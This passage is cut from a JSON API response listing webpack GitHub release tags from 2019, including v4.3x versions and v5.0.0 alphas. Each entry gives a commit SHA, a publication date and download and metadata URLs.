https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2